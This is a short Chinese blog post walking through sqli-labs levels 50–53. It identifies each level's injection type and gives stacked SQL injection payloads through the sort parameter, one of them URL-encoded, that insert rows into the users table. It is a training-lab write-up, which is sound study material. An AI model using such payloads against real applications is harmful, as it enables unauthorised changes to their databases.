less50-53

Qianyuzz's Blog / 2023-05-13 / 原文

less50

数字型注入，查看源码会发现存在堆叠注入
payload
?sort=2;insert users(id,username,password) value ('50','less50','1')

less51

测试1 1' 1' --+ 正常异常正常
可以知道是单引号注入
也是堆叠注入，同上

less52

关闭了报错，可以使用堆叠注入。

less53

输入?sort=rand()，页面无变化，那么说明这关是字符型
用时间盲注
堆叠也可以
payload
?sort=1';insert%20users(id%2cusername%2cpassword)%20values(53%2c'less53'%2c'1')%23
这里我没有用url编码的话是无法注入的。

less50-53更多相关文章

Redis持久化机制（面试考点）与位图API

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

什么是IT技术

即将到来！

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

ubuntu 24.04 部署 mysql 8.4.3 LTS

随机推荐

【游记】CCPC 济南 2024 游记

AJAX & AXIOS-2024/11/1

验证码处理在自动化测试中的应用

一些学科笑话

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

Java，启动！

什么是IT技术

即将到来！

2024/11/1日日志关于JavaScript简介&引入方式以及基础语法的学习

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

原型模式的C++实现

python bytecode解析

09-XSS键盘监听、cookie窃取&文件上传绕过

ubuntu 24.04 部署 mysql 8.4.3 LTS

国标GB28181公网平台LiteGBS国标GB28181视频平台建筑工地无线视频联网监控系统方案

imes完工下线

android 13 更改手机信号调整

BFS(Breath First Search 广度优先搜索)